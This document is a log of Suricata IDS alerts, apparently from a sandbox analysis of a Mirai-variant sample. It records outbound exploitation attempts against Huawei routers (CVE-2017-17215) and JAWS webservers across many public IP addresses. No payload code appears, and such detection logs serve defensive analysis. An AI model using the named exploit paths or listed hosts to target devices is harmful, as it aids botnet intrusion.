          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57020 -> 156.61.209.114:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43268 -> 156.134.142.216:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38152 -> 156.64.119.227:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49108 -> 156.75.54.186:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52016 -> 197.195.206.136:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58514 -> 197.112.141.250:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37894 -> 197.57.152.227:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41410 -> 156.67.96.70:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37384 -> 197.59.205.72:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48340 -> 41.182.228.106:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49302 -> 197.161.10.65:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39612 -> 197.17.133.49:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46368 -> 197.41.187.197:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46464 -> 41.155.219.178:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48890 -> 197.213.139.45:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52456 -> 197.123.236.32:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47630 -> 156.44.235.16:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45280 -> 156.76.37.56:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34620 -> 197.69.230.169:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42426 -> 156.92.88.230:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49474 -> 156.114.247.128:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38496 -> 41.29.43.123:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40266 -> 156.155.195.253:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59634 -> 156.205.236.9:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45944 -> 41.89.254.96:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40626 -> 41.42.112.90:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56880 -> 197.163.246.243:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47254 -> 41.29.72.16:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40346 -> 197.169.178.55:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60072 -> 41.102.141.16:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38762 -> 41.8.68.180:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49966 -> 156.180.14.86:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38648 -> 197.235.235.154:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54428 -> 41.153.210.0:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34966 -> 41.38.16.103:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50588 -> 156.23.144.81:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51570 -> 156.31.133.222:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35620 -> 156.29.58.55:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54440 -> 197.25.2.28:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55288 -> 197.79.233.80:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53770 -> 197.95.113.211:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35976 -> 197.220.67.112:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43080 -> 41.235.143.156:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50946 -> 41.237.37.216:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39254 -> 197.122.183.130:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35196 -> 156.30.14.110:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39598 -> 41.164.73.85:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59700 -> 41.9.223.148:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57354 -> 156.96.122.224:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36916 -> 197.198.188.20:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45290 -> 156.85.239.222:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43294 -> 156.208.58.152:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41656 -> 41.204.44.51:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38670 -> 57.16.75.18:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38670 -> 57.16.75.18:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42998 -> 184.145.222.88:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58952 -> 197.213.172.174:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45240 -> 41.34.236.132:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39884 -> 41.223.100.164:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42998 -> 184.145.222.88:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58152 -> 156.177.86.195:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60102 -> 156.199.249.209:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52416 -> 140.3.1.82:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52416 -> 140.3.1.82:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59660 -> 40.208.105.235:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59660 -> 40.208.105.235:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33942 -> 41.243.122.209:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41356 -> 197.7.151.132:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32814 -> 219.81.41.173:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:32814 -> 219.81.41.173:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55660 -> 197.174.22.109:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53180 -> 156.1.156.161:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33060 -> 156.191.133.121:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41106 -> 197.32.245.136:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60726 -> 61.110.206.21:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60726 -> 61.110.206.21:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54382 -> 198.165.232.52:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48142 -> 152.212.240.188:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54382 -> 198.165.232.52:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33208 -> 173.72.159.111:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50164 -> 102.137.240.134:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33208 -> 173.72.159.111:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58878 -> 109.62.119.7:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50164 -> 102.137.240.134:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58878 -> 109.62.119.7:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49510 -> 173.230.32.46:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49510 -> 173.230.32.46:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36248 -> 201.125.207.171:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35566 -> 78.65.198.150:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49178 -> 124.224.219.168:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48142 -> 152.212.240.188:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49178 -> 124.224.219.168:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36248 -> 201.125.207.171:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54236 -> 208.132.145.179:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57802 -> 137.224.169.141:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44888 -> 197.232.54.243:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54236 -> 208.132.145.179:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45998 -> 153.78.233.79:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52372 -> 175.75.70.54:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40114 -> 212.53.111.208:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57802 -> 137.224.169.141:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40114 -> 212.53.111.208:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52372 -> 175.75.70.54:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45998 -> 153.78.233.79:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35558 -> 85.42.189.137:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35558 -> 85.42.189.137:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35566 -> 78.65.198.150:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55630 -> 8.255.164.128:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48998 -> 176.1.7.9:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55630 -> 8.255.164.128:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48998 -> 176.1.7.9:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59728 -> 105.172.5.168:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59728 -> 105.172.5.168:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57092 -> 197.218.205.133:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37594 -> 159.108.60.226:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37594 -> 159.108.60.226:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56716 -> 173.230.39.235:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56716 -> 173.230.39.235:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54064 -> 197.191.214.20:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45092 -> 163.172.255.118:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45092 -> 163.172.255.118:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34190 -> 25.167.5.214:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34190 -> 25.167.5.214:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39326 -> 117.50.49.125:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49696 -> 68.152.141.251:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39326 -> 117.50.49.125:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49696 -> 68.152.141.251:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45984 -> 141.145.232.229:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56764 -> 156.191.36.93:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45984 -> 141.145.232.229:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54240 -> 41.92.111.44:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57656 -> 156.207.68.217:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56596 -> 197.175.190.91:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53000 -> 203.176.98.178:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56908 -> 158.79.170.58:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48012 -> 156.33.52.217:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47508 -> 164.21.186.72:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:47508 -> 164.21.186.72:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60352 -> 50.162.207.43:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60352 -> 50.162.207.43:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60342 -> 156.64.9.169:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45350 -> 156.131.234.245:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53000 -> 203.176.98.178:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38986 -> 223.91.116.75:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38986 -> 223.91.116.75:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35602 -> 144.147.255.221:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53792 -> 72.71.46.23:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60630 -> 41.206.186.43:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53792 -> 72.71.46.23:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49320 -> 41.54.199.196:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47664 -> 204.186.97.165:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35602 -> 144.147.255.221:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:47664 -> 204.186.97.165:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56908 -> 158.79.170.58:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36032 -> 156.131.78.126:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60600 -> 197.192.25.36:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53578 -> 197.221.56.147:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52296 -> 209.173.84.48:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52296 -> 209.173.84.48:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36858 -> 197.99.153.20:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47154 -> 41.141.61.3:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47124 -> 197.67.155.19:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40346 -> 197.159.140.182:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60336 -> 207.211.198.16:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60336 -> 207.211.198.16:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46176 -> 173.126.146.75:80
